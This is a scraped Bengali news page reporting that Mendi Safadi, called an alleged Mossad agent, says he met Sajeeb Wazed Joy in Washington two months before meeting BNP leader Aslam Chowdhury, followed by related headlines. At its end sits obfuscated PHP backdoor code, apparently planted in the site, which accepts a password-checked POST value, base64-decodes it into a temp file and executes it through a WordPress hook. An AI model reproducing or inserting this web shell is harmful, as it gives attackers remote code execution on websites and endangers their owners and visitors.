শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

আসলামের দুই মাস আগে জয়ের সঙ্গে সাক্ষাত হয়েছিল সাফাদির (ভিডিও)

news-image

mandi-safadi-sনিজস্ব প্রতিবেদক : প্রধানমন্ত্রী শেখ হাসিনা পুত্র ও তার তথ্য-প্রযুক্তি উপদেষ্টা সজীব ওয়াজেদ জয়ের সঙ্গেও সাক্ষাত হয়েছিল ইসরাইলি গোয়েন্দা সংস্থা মোসাদের ‘কথিত এজেন্ট’ মেন্দি এন সাফাদির।দিল্লিতে বিএনপি নেতা আসলাম চৌধুরীর সঙ্গে ‘কথিত বৈঠকের’ অন্তত দুই মাস আগে ওয়াশিংটন ডিসিতে জয়ের সঙ্গে তার এই সাক্ষাত হয়েছে বলে জানিয়েছেন মেন্দি সাফাদি।

ইউটিউবে আপলোড করা এক ভিডিও সাক্ষাতকারে সজীব ওয়াজেদ জয়ের সঙ্গে সাক্ষাতকারের কথাটি জানিয়েছেন ইসরাইলের ক্ষমতাসীন লিকুদ পার্টির নেতা মেন্দি সাফাদি।যুক্তরাষ্ট্র থেকে গতকাল বৃহস্পতিবার মেন্দি সাফাদির সাক্ষাতকারের এ ভিডিওটি ইউটিউবে আপলোড করা হয়। তবে কোথায় ও কখন সাক্ষাতকারটি গ্রহণ করা হয়েছে তা ভিডিও দেখে নিশ্চিত হওয়ায় যায়নি।

ওই সাক্ষাতকারে মেন্দি সাফাদি বলেনে, বাংলাদেশের অনেক লোকের সঙ্গে আমার ফেসবুকে যোগযোগ রয়েছে। ভারতীয় জনতা পার্টির (বিজেপি) আমন্ত্রণে যখন দিল্লি সফর করি তখনও বাংলাদেশের কিছু রাজনৈতিক ও মানবাধিকার কর্মীর সঙ্গে আমার সাক্ষাত হয়েছে।তিনি বলেন, ‘আমি আসলাম চৌধুরীর সঙ্গে দেখা করেছি এটা সত্য তবে তা কোন বৈঠক ছিল না। ভারতীয় জনতা পার্টির আমন্ত্রণে আমি যাই, তখনি আমার আসলাম চৌধুরীর সঙ্গে দেখা হয়।’

মেন্দি সাফাদি বলেন, আসলাম চৌধুরীর সঙ্গে সাক্ষাতের দুই মাস আগে ওয়াশিংটনে সজীব ওয়াজেদ জয় নামে বাংলাদেশের একজন উচ্চ পর্যায়ের কর্মকর্তার সঙ্গে সাক্ষাত হয়েছে।এ সময় সাক্ষাতকার গ্রহণকারী টেলিভিশন পর্দায় প্রধানমন্ত্রী পুত্র সজীব ওয়াজেদ জয়ের ছবি দেখিয়ে বলেন ইনি কি সে ব্যক্তি? উত্তরে মেন্দি সাফাদি বলেন, হ্যাঁ ইনিই সে ব্যাক্তি যার সঙ্গে ওয়াশিংটনে সাক্ষাত হয়েছিল।মেন্দি সাফাদিকে প্রশ্ন করা হয়, সজীব ওয়াজেদ জয় বাংলাদেশের প্রধানমন্ত্রী শেখ হাসিনার ছেলে আপনি কি জানেন? জবাবে সাফাদি বলেন, আমি জানতাম তিনি বাংলাদেশের একজন উচ্চপদস্থ কর্মকর্তা, তবে তিনি যে প্রধানমন্ত্রীর পুত্র, তা আমার জানা ছিল না।

 

এ জাতীয় আরও খবর

রাতে বাঁচা-মরার ম্যাচে ভারতের মুখোমুখি হচ্ছে বাংলাদেশ

ঢাকা-টাঙ্গাইল মহাসড়‌কে ১৩ কি‌লো‌মিটার অংশে যানজট-ধীরগ‌তি‌

টেকনাফ সীমান্তে রাতভর মর্টার শেল-গুলির বিকট শব্দ

সেতু ভেঙে মাইক্রোবাস খালে, নিহত ৯

শেখ হাসিনা ও মোদির যৌথ বিবৃতি: সম্পর্ক, বাণিজ্য ও সহযোগিতার ওপর গুরুত্বারোপ

অসৎ ব্যবসায়ী ও দুর্নীতিবাজদের বিরুদ্ধে জিরো টলারেন্স: ওবায়দুল কাদের

ভারতে চিকিৎসা নিতে যাওয়াদের জন্য সুখবর আসছে

রাসেলস ভাইপার আতঙ্ক, যা বললেন স্বাস্থ্যমন্ত্রী

সেতু ভেঙে মাইক্রোবাস খালে, নিহত ১০ বরযাত্রী

বাংলাদেশ-ভারতের ১০ সমঝোতা স্মারক ও চুক্তি সই

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}